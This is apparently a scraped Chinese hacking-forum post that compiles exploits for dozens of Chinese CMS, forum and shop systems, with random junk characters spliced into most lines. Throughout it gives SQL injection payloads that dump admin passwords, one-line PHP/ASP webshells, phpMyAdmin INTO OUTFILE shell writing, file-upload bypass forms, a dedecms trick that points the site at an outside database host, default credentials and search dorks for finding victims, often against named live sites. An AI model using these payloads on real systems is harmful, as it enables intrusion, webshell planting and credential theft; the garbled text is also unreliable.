启航企业建站系统 cookie注入漏洞通杀所有版本6 t" I5 K5 T% z& j+ ]* C( Z
# J, w; Q! n$ |
直接上exploit:
( {& A% M) N3 M+ v# {javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
/ [8 p/ {. b0 p% k! n: Otest:http://www.tb11.net/system/xitong/shownews.asp?id=210
" \+ V4 h5 l3 P/ F$ Y5 A" t* x) M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 O9 T# E+ ~: t. N, N9 ?Asprain论坛 注册用户 上传图片就可拿到webshell4 s& F. A7 L" m8 A& F
7 Z3 W1 I% k" ]
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
3 a9 G* ], m- J1.txt存放你的一句话马 如:<%execute(request("cmd"))%>3 |9 ~& t0 |( g4 w/ b! y& R
2.gif 为一小图片文件,一定要小,比如qq表情图片
4 k( b2 @. O/ S. H3 h2 G" @3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
0 x$ K2 C2 l( @3 @) k4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
k5 Q; D! r. u) \9 Q5.q.asp;.gif8 N+ G) V( M, g; {9 G0 g
google:Powered by Asprain/ s$ }" E# i# x2 h# i/ q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 [% P( o, j: e, M6 m, e* v% I/ x5 L2 A9 F3 A# k8 }: H
ShopNum1全部系统存在上传漏洞。
& ^( _4 v% w& _2 j! r- b; T6 I; T0 P
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
! C0 c, W: \5 r3 i( ]. ~" L按说明 提示登录后台。。
" @% t2 x6 h, N' Z+ {在后台功能页面->附件管理->附件列表1 K& ^. g% l/ o9 T `5 q2 y
可以直接上传.aspx 后缀木马
" ^' y0 z. L! j' X' g' dhttp://demo.shopnum1.com/upload/20110720083822500.aspx! v# J1 G8 V% H# w3 O5 o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 s! d, n. B* U6 h
7 q7 b) s. e& t" w* `# U0 V% \牛牛CMS中小企业网站管理系统 上传漏洞6 ?% d, t- }) D
/ ~+ \" x2 R x) t4 X2 n, @, ?( Y
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。0 l1 A1 Y8 Q& v/ F+ a3 q: E
后台:admin/login.asp
7 F5 j4 G$ K: rewebeditor 5.5 Nday
+ N8 F/ r+ [, u) xexp:8 K5 M" Q, ]. A% U }# _+ ?" `
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?) G# H3 H3 j1 K: _7 q
<input?type=file?name=uploadfile?size=100><br><br>?" P; k) _3 G" M, W0 ~
<input?type=submit?value=upload>?
0 |; N* _" h ~</form>. M/ k1 c& d5 J& Y
ps:先上传小马.( ]$ a% s5 F* V7 A- b E% x
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏' g7 k/ V' I8 r9 ^, j4 o4 Y: F F0 v A
( v+ V' u; e1 b) ~3 O0 H4 ]--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# H( Y8 o b9 K1 t9 \5 y* A9 S
/ O; N) C2 V- {/ X. WYothCMS 遍历目录漏洞
5 }# z b; I2 n" k9 u" @' D) r. v3 \9 k* D: _# e8 x
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。+ Y* U) V* W$ h/ Q) _! n
默认后台:admin/login.asp
8 D8 H6 y* G- e% |. G遍历目录:% U) H) O' H% \; u$ g6 {
ewebeditor/manage/upload.asp?id=1&dir=../% i4 @+ O$ ?* y$ @
data:$ x/ v% \$ H: G4 v! x4 l6 F
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
' Z; M# y( l, X+ s0 W4 R5 q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. h, R. O8 E$ J4 J+ B' A+ Q5 `
& ~" n: T0 R# `! g7 k0 [2 V
Net112企业建站系统 1.0+ l: N. E, A+ |3 u2 F: K
7 g' T6 Z& Z9 |源码简介:( d" p( m" @# J0 q: Z: C7 a$ z7 ~8 Q$ y g% m
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
: K" S! D2 E4 }" l: O添加管理员:
& q) X( C3 x# o2 r8 P3 ihttp://www.0855.tv/admin/admin.asp?action=add&level=2$ m. v4 m% ]! }* S- m2 n/ R% D! ^$ j
其实加不加都不是很重要,后台文件都没怎么作验证。
6 l" T' E1 S0 [0 ?: O3 q9 v上传路径:) Q. B( q/ u' I' e
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200! \# F; `1 P6 v% N# Q% X
http://www.0855.tv/inc/Upfile.asp?Stype=2
# w5 ^& a! _6 i( {怎么利用自己研究。2 X! S5 ?5 V7 ^
遍历目录:
, }+ u8 i4 {+ L3 Rhttp://www.0855.tv/admin/upfile.asp?path=../..
3 @4 S" @6 w# G; `6 j* C如:1 a! A4 f+ N5 Z" I* Y8 @) ^4 g
http://www.0855.tv/admin/upfile.asp?path=../admin
8 H/ G" _+ h, d: _( dhttp://www.0855.tv/admin/upfile.asp?path=../data# U& b9 |& A$ n* ^: y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 Y3 F- h# ?8 Q# P0 L& m, ~
/ l9 z+ x- a/ K易和阳光购物商城通杀 上传漏洞0 o. w6 f$ ~9 [/ U
- @4 W, z2 H4 }: _7 ?
前提要求是IIS6.0+asp坏境。
# I; J. U" L9 ?漏洞文件Iheeo_upfile.asp
0 N$ U7 \9 X9 ?5 {. b1 O( U% T过滤不严.直接可以iis6.0上传
$ c) y3 ]# O- s9 @把ASP木马改成0855.asp;1.gif
7 ?, y4 e M& p8 `" V9 m直接放到明小子上传
3 v, h1 x- T5 k4 K7 ^3 OGoogle搜索:inurl:product.asp?Iheeoid=
! C/ g# |% B; t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* D4 }. a) i) W* y" m' m2 v/ y
$ B4 U2 d4 P3 y @1 ^4 `
phpmyadmin后台4种拿shell方法4 c/ Z! Q1 Z: h4 Q
: f; R% }' G& k8 s( {
方法一:
4 W+ d/ B G9 J: V' bCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
; C- r5 ]1 v: S) L- O! O, YINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');% V! W, e D6 X3 E
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';! [% Z9 H- `7 r# x) p0 h% }5 g; Y
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
) E9 K2 K5 q1 B& R* E一句话连接密码:xiaoma
a, x4 R& G! \% W方法二:
% a0 E9 M( B d UCreate TABLE xiaoma (xiaoma1 text NOT NULL);
, _, }* W8 ]; N( L/ _1 DInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');/ v! u9 M. h _1 w, V7 U1 A& j
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';6 d* e8 x, n9 S1 W* s
Drop TABLE IF EXISTS xiaoma;
5 |+ V, J" v0 L* y: C* r. s方法三:
) l8 u2 t N5 P# d; W7 Z% I) N读取文件内容: select load_file('E:/xamp/www/s.php');4 P/ [; t, ]2 O0 k3 A) a( S
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 w% B5 W% L$ r- K4 Wcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'9 y' m( J2 f5 O# ?& ]- j
方法四:
@6 ?" c$ c5 c8 g7 t. {- Mselect load_file('E:/xamp/www/xiaoma.php');
7 }) q, I# u# c0 F6 B# U, [select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'- k( Z5 g2 @* ^& u5 [! i
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir* R9 ]3 e: W. M! i7 G7 Z: e& j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ i4 k+ `) `3 s; Z2 V) H( V/ Z4 E1 Z% ]# N; ~# W9 D) }$ [! f
传信网络独立开发网站源码0day漏洞
, p+ j1 j% ~8 R9 L
2 A1 l- }; I) i0 d& W) S# d后台system/login.asp
/ X: }/ c9 R$ d/ p* l1 }9 n+ z进了后台有个ewebeditor
1 p( R, q& _" ~! SGoogle 搜索inurl:product1.asp?tyc=
; i L( h E" ]& x+ q9 Z编辑器漏洞默认后台ubbcode/admin_login.asp
4 { |" `* Z) s数据库ubbcode/db/ewebeditor.mdb
& X" w: J% S) H' K默认账号密码yzm 111111
" `/ W$ ` Z! W# W2 l! M8 X
/ W/ G6 {8 V# a0 z- Z$ k# F5 g# l. o拿webshell方法' `4 q7 J) _6 D Y( `
登陆后台点击“样式管理”-选择新增样式
6 I8 L& N- f9 Z+ o' m% A0 x样式名称:scriptkiddies 随便写 2 d# h2 E. [; S1 S' _" D' d7 g! E
路径模式:选择绝对路径 5 B5 @0 M; E) o9 c
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx1 C, q+ J+ H* L
图片类型比如就是我们要上传的ASP木马格式+ c/ G3 s! {. Y7 _
上传路径:/7 e- i( o0 H8 f+ w- g
图片限制:写上1000 免的上不了我们的asp木马
& K. M( O* B( R6 u5 [9 h: K- ]上传内容不要写! U, y& Z( }! d' _- |6 E
可以提交了
3 m& \2 b$ I! |$ X+ f& {样式增加成功! + e) m/ o0 i, {/ ^
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 1 T& i! B ^/ W$ B/ f8 p4 ?- ?% Y
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
3 ]4 A, d! P$ y6 v网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies, \. Y b9 o# a; \
上ASP木马 回车 等到路径2 ]4 ]8 Y2 `$ r* o$ U$ x' O
0 O: J3 A4 i+ \. H4 B- @
后台:system/login.asp
Q' H$ l% e, C4 U u0 lExp:+ Z3 p+ l# J; W/ f; l
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
' ^+ [& m& O$ p3 J测试:4 H. i& {! A6 j+ b
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
/ q0 m- a W! G* ~+ D; thttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
' x! P8 {: h4 O6 w& ` W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ A9 R4 @' G8 K5 \# @& e0 ~
7 A5 E& G& o6 a, U$ [4 ffoosun 0day 最新注入漏洞2 {& \' s3 z) J6 b7 u
* Q, z1 S! N1 ]+ g. d
漏洞文件:www.xxx.com/user/SetNextOptions.asp
) V- e8 P, ~6 m# _8 Q" ~- Y5 P利用简单的方法:
# A3 Y' Z; W! Y7 q/ u暴管理员帐号:8 E0 j& j2 a& ^2 C" ~" V1 |
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin4 g7 h5 V. [1 K# q
暴管理员密码:
; }$ O' z' Q8 F8 Khttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,: a6 A, M8 Q" Y- [% e* @1 U* A- ?* k, l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ f, H7 t: p: X- D' y' }3 F% K) l. _! R3 ]/ q6 t. q# o* N! _
网站程序的版权未知!5 K! s5 `. j! H8 G4 {
. K& g( U4 ]4 _. d' v默认网站数据库:
' D$ N4 y! A0 x% @9 S, b& dwww.i0day.com/data/nxnews.mdb
& X. K u! `' _+ R5 M1 Pewebeditor 在线编辑器:
) j& y. K) ~1 ]5 H编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
$ s$ T) v* q% g( g" O登录地址:ewebeditor/admin_login.asp9 s6 o6 k: Y9 G
默认密码:admin admin1 a8 v8 A0 o6 R# _- c
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
# S* @# ]7 u* c, f5 |" s8 {" l1 [7 t* c! J5 ]) `0 B1 f
Sql注入漏洞:
" C; A0 V9 P: O# xhttp://www.i0day.com/detail.asp?id=12) |7 H! f* u% {- M. T
exp:6 {8 y/ I% Y4 f; T) O9 F
union select 1,admin,password,4,5,6,7,8 from admin& O! R% s& x, @5 G5 I* J
爆出明文帐号/密码
$ t, x2 M$ S6 T/ x0 n( K6 T+ Z% O# ^$ Y' j" }4 ]+ b, [
上传漏洞:9 e' G/ b4 m/ Z- o3 ^
后台+upfile.asp; Z& Z; l: g& Q) g5 K; D* N6 E
如:
& e, b/ w4 y8 I; ]0 U! jhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
+ y7 l4 u5 f4 [1 ^shell的地址:网址+后台+成功上传的马( R% O7 h, c3 {( U( S
google:inurl:news.asp?lanmuName=
M8 ?. v1 y5 f# a f+ w, B2 L------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* e3 y" Q) F$ I' u; }8 r+ p( d0 r; {0 q* l* u% F
dedecms最新0day利用不进后台直接拿WEBSHELL
Y( N7 p! n5 P0 ~! |( g
1 L6 S& F/ ~1 ?; F2 e+ Q& t拿webshell的方法如下:
- o! W9 I9 Y9 |网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.' X) b6 y! A2 u' V, v; n
前题条件,必须准备好自己的dede数据库,然后插入数据:6 J/ b. U" P* p S: P
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
# o- @! @; o* C2 R* {) ~( h
# L9 o2 ?. |9 B+ {4 y/ A5 D再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。9 D! m: ~; w0 {3 J/ P3 o1 J
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">8 s# H) g9 o7 w4 n' z" j! k u
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />' k, G( Q) [! k G! u' \9 ^/ B
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
! `8 ?. J+ w% y* D6 r* P<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
9 @5 G) I5 i% ?! w4 L0 A1 f; m% s<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 [% I7 M6 l; j. z; ?* h0 `% t<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
7 V1 ~7 y7 }& p3 q<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />& f, x% W) i) X `
<input type="text" value="true" name="nocache" style="width:400">
! k+ ^( e8 \& b5 G3 l1 {0 x+ j<input type="submit" value="提交" name="QuickSearchBtn"><br />! v; v7 r l: p- ]1 E% t6 K
</form>
! s# J2 h+ P* n' S8 ]2 ^/ F' ~<script>. K: f. b" M1 J* U$ K( P
function addaction()" w" _" |2 ]+ O, m
{
: b) s. o+ l# U4 p+ _ odocument.QuickSearch.action=document.QuickSearch.doaction.value;
+ N# ~* Y% R" C5 }# { C# U) H+ l}
: E: T. e. V7 o O7 Z% W</script>
) o, o* `( K+ y/ M% L-----------------------------------------------------------------------------------------------------------------------------------------------8 b, q1 b) f' r) l% I( M& j
( Q9 G* ^1 k6 [1 d p, c( qdedecms织梦暴最新严重0day漏洞' h% q. |6 K& X* q1 ~9 A
bug被利用步骤如下:
% K8 J* ?+ |6 X/ Shttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root" G. `- K3 g* \- T. w! A4 |
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
4 H3 A+ ^6 [7 F" e-------------------------------------------------------------------------------------------------------------------------------------------
. X) k! m# g, n; [( ], @1 t6 h8 {) P$ x
多多淘宝客程序上传漏洞 ) P) Q0 W1 b. O! X$ y, M: y$ ~; U
漏洞页面:
9 F }( G: O- e. Z* w6 {. a! a* H i. Zadmin\upload_pic.php
; T0 x8 g. Q/ Z0 h传送门:# m+ m5 W' _ d+ P: A" v
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
! T- u$ P) a7 K) \+ aPS:copy张图片马 直接 xxx.php 上传抓包地址!2 X* F5 ^% Y% B5 g, X2 Z7 h) _* D
------------------------------------------------------------------------------------------------------------------------------------------------------- g4 e+ ]$ `" d# T/ c
' J. |4 J c8 e无忧公司系统ASP专业版后台上传漏洞
' U/ a- Z' P. @$ B1 b漏洞文件 后台上传: M6 u. ]0 E3 B3 u
admin/uploadPic.asp
, a" N$ Y) e" z( z8 x2 c漏洞利用 这个漏洞好像是雷池的, o% [6 b* E0 _
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1, T5 y7 ?0 j' u. q/ M
等到的webshell路径:$ \1 v" w3 h7 D# g3 [
/UploadFiles/scriptkiddies.asp;_2.gif& P. o, p0 _8 S0 W7 Z) H# d V
---------------------------------------------------------------------------------------------------------------------------------------------------
* b }3 U7 Y# B9 \: D! U) i) }
9 p$ F1 f8 Q( y7 ?4 b) k0 f住哪酒店分销联盟系统2010
8 h& g2 C4 j; q% k1 F( k1 A SSearch:
* y8 ]9 k1 Z# Z! p7 l& uinurl:index.php?m=hotelinfo
0 O9 ^! x$ X0 p2 c0 ?. thttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
" |9 g0 C& _9 ]8 I2 s默认后台:index.php?m=admin/login6 U: ?; V4 n i. k0 C5 `* W& a
--------------------------------------------------------------------------------------------------------------------------------------------------, _9 R6 p2 P( p% C/ K* h4 Q5 q. P
0 ?0 p9 ]( }3 c7 F' I5 zinurl:info_Print.asp?ArticleID=5 V" \/ c$ d' U, e7 z4 h0 D
后台 ad_login.asp
0 P+ K n$ B# J' [: U0 U爆管理员密码:# \) d! \0 D* e- ]# A6 r O
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
! M8 }+ z; _& x# H# d+ j: R------------------------------------------------------------------------------------------------------------------------------------------------------------
' x$ E* {. D) k9 M9 N, j- M: ~6 J- D( N. N, U* K
搜索框漏洞!
& Q- y; r1 d. x# K%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
2 q& {' ]7 z4 i--------------------------------------------------------------------------------------------------------------------------------------------------------
& I' \+ @) f7 ^2 p# I7 f
q4 l6 }' m" o2 P关键字:" j0 p/ K. `3 G7 X" L$ |) E
inurl:/reg_TemletSel.asp?step=28 ~2 f1 E! _, b0 y* S c4 O' L: m
或者
- E9 A, H/ [: t. j0 s电子商务自助建站--您理想的助手
! {' ?9 H4 e2 Q4 S7 |-------------------------------------------------------------------------------------------------------------------------------------------------
# \- N. {8 z# d
; G+ f5 ?; k: }7 B; [0 w m, n: {2 ^iGiveTest 2.1.0注入漏洞, E: g, H6 T x9 K/ ]% O
Version: <= 2.1.0; |7 v. E* |) y U+ I2 r6 G0 c# `
# Homepage: http://iGiveTest.com/
4 t8 A+ g( [- F0 g* L谷歌关键字: “Powered by iGiveTest”
# `% u. O7 a/ X8 k6 @随便注册一个帐号。然后暴管理员帐号和密码8 S; l$ i& `! y* D2 M
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1: k+ G& O* h0 Y; q1 a% R9 `+ T, Q' ?6 L
------------------------------------------------------------------------------------------------------------------------------------------------+ s5 d" l* d# V* J
5 t" Y8 E: a. k! N4 {
CKXP网上书店注入漏洞
# I) C# k! n$ L" R- V/ n工具加表:shop_admin 加字段:admin
# ]$ v( K+ x7 {& k: s后台:admin/login.asp
: r" R8 `. l# q. T W: s登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/+ f# T, m* H# Y* T1 P
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
; \ x' I4 l3 {( {' `& _6 I# g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; t; ^. G: a, w9 y! y
( p: ~" g" ^+ C8 R$ c n
段富超个人网站系统留言本写马漏洞7 L$ V( M( n5 ?% h( w/ }& @
源码下载:http://www.mycodes.net/24/2149.htm' {9 K# f5 L/ s2 K
addgbook.asp 提交一句话。
u8 ], m+ U7 M* u1 Q9 Z连接: http://www.xxxx.tv/date/date3f.asp; S' j; f! |/ J) T' K5 A+ G1 n
google:为防批量,特略!
5 W2 V& G+ w" m, c7 _% E+ S-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% J& D; f( r* ?9 {# x( ]6 n; n+ G9 I8 }. P
智有道专业旅游系统v1.0 注入及列目录漏洞; w. M& V: q1 g. u. K0 [7 @9 Y
默认后台路径:/admin/login.asp
* E. R- v& t- C4 u6 J" k默认管理员:admin7 p! h1 N/ y7 k# Y. h3 l
默认密码:123456. q: o7 v% ^2 N
SQL EXP Tset:
1 i4 e4 p2 q4 I. N: `' z3 mhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
) `! A! N1 q$ E o% z+ E% p9 M------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 V3 z% { Q% o
& D% Y/ h# b2 M9 ?ewebeditor(PHP) Ver 3.8 本任意文件上传0day2 \. R0 Q0 `% t# c- c! Q8 o
EXP:& v1 n' ~# o, t$ u, K9 D# M
<title>eWebeditoR3.8 for php任意文件上EXP</title>/ f/ D2 y) j8 {( i( r7 z) W Y/ [, F& a8 ~
<form action="" method=post enctype="multip
0 Y% \0 n/ R, K( g6 n) Tart/form-data"> : N; E0 J4 O$ x4 `+ i
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> " v# o) I3 @) e# W$ p9 W9 b7 B
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
\( X- x) P% p5 ]- G<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> $ i2 Z9 |7 q- J# c4 C6 u: E
file:<input type=file name="uploadfile"><br>
$ |9 B/ l' g1 l& F) e6 A. Y<input type=button value=submit onclick=fsubmit()>
; v% Q& g0 ~$ w</form><br> ! j9 M7 b7 z |* ?" r; c" o- H }
<script>
+ C9 o* U1 x. S& o4 T0 P0 C4 o" ffunction fsubmit(){ " q s: m$ ^6 X9 x
form = document.forms[0]; + }3 g2 V4 m8 X, e: e1 p! k& U3 p
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; / r1 a, r. I( _+ H- X
alert(form.action); W4 q: {. N* Z0 y: }( W
form.submit();
7 t; @' k7 t2 S% ]} - H, Z) R$ `* g
</script>) M2 z9 E/ a. ?8 l/ c
注意修改里面ewebeditor的名称还有路径。
1 k& ?3 f( N0 g: |# x5 O+ L---------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 g! W1 p. l% S2 \" {) t. n5 r8 R
6 {: y* a3 A8 h# ?
提交’时提示ip被记录 防注入系统的利用
( z. c$ K1 ^& |, ?' f网址:http://www.xxx.com/newslist.asp?id=122′
. x6 a! H4 y, n提示“你的操作已被记录!”等信息。
/ Q; |& J+ s8 M8 L: B* c利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
' J9 L$ p- J$ t$ ^$ B-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 r4 @* E& Q! I# ?3 y* R
: U' c5 Q8 v/ o3 j9 P西部商务网站管理系统 批量拿shell-0day/ ]5 F/ E4 E' m
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 1 ? e0 l1 e3 c8 x4 W% A/ C
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
( t. e8 K3 P* |8 K/ C' Z/ x* i% G0 J5 d2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合+ Y& Q+ A" y/ T3 ~5 K' K" X# F
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂% Z0 A- k8 z" R2 ]
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 S* J+ k/ V Y& G1 [0 v' f
9 M& D$ a2 O& \) q1 ~1 K) P
JspRun!6.0 论坛管理后台注入漏洞
9 l6 f' _7 v$ `, v' c5 J6 O& m8 b
# F, B$ D7 G( B( `4 B+ H1 `SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
* I+ A6 P7 Z- o4 mJspRun!6.0
( \3 l$ J' ^0 z: z1 \8 o漏洞描述: g( i/ }3 z e3 M8 {! \' i) p# h
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
( f L/ x3 e9 C. L在处理后台提交的文件中ForumManageAction.java第1940行' b: o& ?* p7 A9 b
String export = request.getParameter("export");//直接获取,没有安全过滤
8 s3 G# m) }' q0 l; I$ uif(export!=null){6 U3 q1 u2 k4 X
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
: s$ t* J% g- H8 Z# W: Z3 ~) Vif(styles==null||styles.size()==0){( @0 n* g$ ^8 e4 ~0 m6 f; ?0 b: J
<*参考/ n1 S" L% h2 P0 |; I
nuanfan@gmail.com
1 X# l% |' R+ R! [: e% G*> SEBUG安全建议:4 l% V5 b8 `9 o! C% @7 r+ I% _
www.jsprun.net& b8 u! h. G6 \& o
(1)安全过滤变量export5 L+ j1 L( z2 ]9 S! z( k
(2)在查询语句中使用占位符% e" p' }& ~. Y* C Y" }
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 u/ [- _- c: W3 `" H1 S, Z' ^3 p& F6 j: J8 b- P4 ~
乌邦图企业网站系统 cookies 注入2 t9 R! f8 r# o9 C- }7 q" @
0 y$ V3 r0 V' E4 O
程序完整登陆后台:/admin/login.asp
, B& [- t& T# R; N默认登陆帐号:admin 密码:admin888
! x I7 T/ ]9 h" U0 u7 d" Y语句:(前面加个空格)2 u' Z8 |9 G* M0 V3 [
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin, z; T0 y& h5 m7 k6 i
或者是16个字段:
2 A& v9 H# v; j5 Zand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin6 r' C: c% s. m/ R8 c
爆不出来自己猜字段。3 i+ y% N7 Y" @8 a( \6 V
注入点:http://www.untnt.com/shownews.asp?=88
' g2 h5 Z8 T. a" {9 Ygetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
/ L9 w3 S8 Q( V5 e% _关键字:
7 _: G5 k5 G3 x cinurl:shownews?asp.id=5 M. n# p0 k* l' Y2 h* O. c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------" _2 g5 }7 y9 H6 X6 z# e8 m
5 E+ v" ^! E8 |: `) j( g" E
CKXP网上书店注入漏洞
: P4 d! v. ]7 k2 u4 { U; f
1 z+ h9 d( T8 r工具加表:shop_admin 加字段:admin9 Y, i& d& a, E U& v# z
后台:admin/login.asp " q7 N! S0 G8 E! C% ^ g
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/1 [- K& v! W5 t4 ]1 Q! k* S
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息- w( D6 I6 T; c- X
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' u6 [+ z. j$ U" }) i
$ w& K" _# N$ @" B" CYxShop易想购物商城4.7.1版本任意文件上传漏洞( A+ D- O0 d0 a5 m
) u! {9 p- {6 H1 g
